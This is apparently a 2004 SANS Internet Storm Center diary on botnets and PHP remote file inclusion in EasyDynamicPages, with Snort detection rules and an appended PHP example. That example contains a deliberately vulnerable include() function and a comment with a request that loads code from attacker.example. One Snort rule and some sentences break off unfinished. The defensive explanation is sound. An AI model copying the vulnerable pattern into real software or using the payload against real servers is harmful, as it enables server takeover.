SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-10-09

Botnets, PHP includes

Published: 2004-10-09
Last Updated: 2004-10-10 00:26:49 UTC
by Erik Fichtner (Version: 1)
Still More Botnets:

We're receiving yet more reports of successful social engineering attacks and
GDI+ JPEG attacks that cause a UPX- and Morphine-packed trojan horse (Gaobot, SDbot,
RxBot) to be installed, with the resulting botnet used for typical nefarious

Most current anti-virus packages don't properly unpack these packed binaries, and so
don't detect them terribly well. There are also reports that some of the trojans
interfere with automated AV update procedures.

Patches applied to both the computer itself and the user at the console should be
sufficient. If you have the facility to capture, or block, IRC traffic to
unknown IRC servers (sometimes not on port 6667/tcp, either), you can potentially
disrupt the botnet.


We received a report of a web server being compromised via a long-standing
problem in a PHP script package, EasyDynamicPages (EDP; CAN-2004-0073).

The following Snort rule should catch attempts:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP EasyDynamicPages exploit"; \
classtype:web-application-activity; sid:900018; rev:1; \
reference:url,; reference:cve,CAN-2004-0073; \
flow:established,to_server; uricontent:"edp_relative_path=";)

Also, be aware that EDP isn't the only vector to this vulnerability. Any PHP
page that passes a variable a remote attacker can set to include() or require()
can be exploited the same way: with allow_url_fopen enabled, PHP will fetch the
attacker's URL over the network and execute the script it returns.

A more generic method is to search for URLs inside your URIs (a query argument
whose value is itself an http:// URL), which shouldn't happen unless you're
proxying or doing odd redirects; unfortunately that happens far more often than
it really should, so expect some false positives. YMMV.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg: "handlers experimental -- URL in URI proxying with arg stacking"; \
classtype:string-detect; sid:900019; rev:1; priority:4; flow:to_server,established; tag:host,90,seconds; \

At any rate, if you're a PHP developer, you should triple-check your code
to make sure that an attacker can't feed a URL into an include(), and if you have PHP
on your server, you should probably disable allow_url_fopen if you haven't
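
To make the include() problem concrete, here is an added example (not code from the diary or from EasyDynamicPages) showing the vulnerable pattern beside a hardened version. The parameter name edp_relative_path is taken from the Snort rule above; the module table, file names and directory layout are assumptions made for the illustration.

```php
<?php
// Added example, not code from the diary or from EasyDynamicPages.
// The parameter name edp_relative_path comes from the diary's Snort
// rule; module names and paths below are assumed for illustration.

// ---- Vulnerable pattern ---------------------------------------------
// The script trusts a request variable to locate its own config file.
// A request such as
//   page.php?edp_relative_path=http://attacker.example/
// makes PHP (with allow_url_fopen = On) fetch
//   http://attacker.example//config.php
// over the network and execute whatever the attacker serves there.
function vulnerable_include(array $get)
{
    $edp_relative_path = $get['edp_relative_path'];   // attacker-controlled
    include $edp_relative_path . '/config.php';
}

// ---- Hardened pattern -----------------------------------------------
// 1. Never build an include path from request data; map the request
//    value onto a fixed table of known files instead.
// 2. Resolve the result with realpath() and confirm it still lives
//    under the directory you expect, so '..' and symlinks cannot
//    escape it.
function safe_include(array $get, $base_dir)
{
    $allowed = array(            // assumed module table
        'news'   => 'news.php',
        'events' => 'events.php',
    );
    $module = isset($get['module']) ? (string) $get['module'] : 'news';
    if (!isset($allowed[$module])) {
        header('HTTP/1.0 400 Bad Request');
        exit('unknown module');
    }

    $base   = realpath($base_dir);
    $file   = realpath($base_dir . DIRECTORY_SEPARATOR . $allowed[$module]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($base === false || $file === false
        || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        header('HTTP/1.0 404 Not Found');
        exit('not found');
    }
    include $file;
}

// Belt and braces: even with the code fixed, turn off remote file
// access for PHP's file functions in php.ini:
//   allow_url_fopen = Off
// (On PHP 5.2 and later, allow_url_include = Off is the setting that
// specifically governs include()/require(); it defaults to Off.)
safe_include($_GET, dirname(__FILE__) . '/modules');
```

Note that turning off allow_url_fopen only removes the http:// vector. The vulnerable function above is still a local file inclusion bug afterwards: an attacker who can get a file onto the box (an upload, or a log file they can write into via a request) can still include it by path. Fix the code, and treat the php.ini setting as a second layer rather than the fix.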
